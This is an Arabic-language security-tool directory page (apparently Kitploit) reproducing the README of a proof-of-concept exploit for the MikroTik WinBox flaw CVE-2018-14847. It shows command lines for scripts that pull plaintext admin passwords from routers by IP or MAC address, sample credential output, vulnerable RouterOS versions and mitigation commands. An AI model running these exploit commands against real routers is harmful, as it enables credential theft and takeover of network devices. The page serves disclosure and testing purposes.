Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Mikrotik-router-hack — هذا دليل إثبات المفهوم للثغرة الحرجة في WinBox (CVE-2018-14847) والتي تسمح بقراءة عشوائية للملفات التي تحتوي على كلمات مرور نصية واضحة. لقد تم إصلاح الثغرة منذ فترة طويلة، لذلك انتهى هذا المشروع ولن يتم دعمه أو تحديثه بعد الآن. يمكنك عمل fork له وتحديثه بنفسك بدلاً من ذلك. | Kitploit
أدوات/GitHubGitHub/hacker30468/mikrotik-router-hack
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكاتاختبار الاختراق
GitHubhacker30468/mikrotik-router-hack

Mikrotik-router-hack

هذا دليل إثبات المفهوم للثغرة الحرجة في WinBox (CVE-2018-14847) والتي تسمح بقراءة عشوائية للملفات التي تحتوي على كلمات مرور نصية واضحة. لقد تم إصلاح الثغرة منذ فترة طويلة، لذلك انتهى هذا المشروع ولن يتم دعمه أو تحديثه بعد الآن. يمكنك عمل fork له وتحديثه بنفسك بدلاً من ذلك.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
5523منذ 5 سنواتتمت المراجعة من قبل Kitploit

WinboxExploit

هذا هو دليل على المفهوم للثغرة الحرجة في WinBox (CVE-2018-14847) التي تسمح بقراءة عشوائية للملفات لكلمات المرور النصية العادية.

تم إصلاح الثغرة منذ فترة طويلة، لذلك انتهى هذا المشروع ولن يتم دعمه أو تحديثه بعد الآن. يمكنك عمل fork له وتحديثه بنفسك بدلاً من ذلك.

منشور المدونة

https://n0p.me/winbox-bug-dissection/

المتطلبات

  • Python 3+

هذا السكريبت لن يعمل مع Python 2.x أو الإصدارات الأقل.

كيفية الاستخدام

يتم استخدام السكريبت ببساطة مع وسائط بسيطة في سطر الأوامر.

WinBox (TCP/IP)

استغل الثغرة واقرأ كلمة المرور.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

مثال:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

خادم MAC WinBox (الطبقة 2)

يمكنك استخراج الملفات حتى إذا كان الجهاز لا يملك عنوان IP.

فحص اكتشاف بسيط لأجهزة Mikrotik المتصلة محليًا.

root@kitploit:~
python3 MACServerDiscover.py

مثال:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

استغل الثغرة واقرأ كلمة المرور.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

مثال:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

الإصدارات المعرضة للخطر

جميع إصدارات RouterOS من 2015-05-28 إلى 2018-04-20 معرضة لهذا الاستغلال.

أجهزة Mikrotik التي تعمل بإصدارات RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

لمزيد من المعلومات انظر: https://blog.mikrotik.com/security/winbox-vulnerability.html

تقنيات التخفيف

  • قم بترقية جهاز التوجيه إلى إصدار RouterOS يتضمن الإصلاح.
  • قم بتعطيل خدمة WinBox على جهاز التوجيه.
  • يمكنك تقييد الوصول إلى خدمة WinBox لعناوين IP محددة باستخدام ما يلي:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • يمكنك استخدام بعض قواعد التصفية (ACL) لمنع الوصول الخارجي إلى خدمة WinBox:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • يمكن تحديد الوصول إلى خدمة mac-winbox عن طريق تحديد الواجهات المسموح بها:
root@kitploit:~
/tool mac-server mac-winbox

حقوق النشر

  • برعاية CERTCC إيران (https://certcc.ir). جميع الحقوق محفوظة.
تنزيل الأداة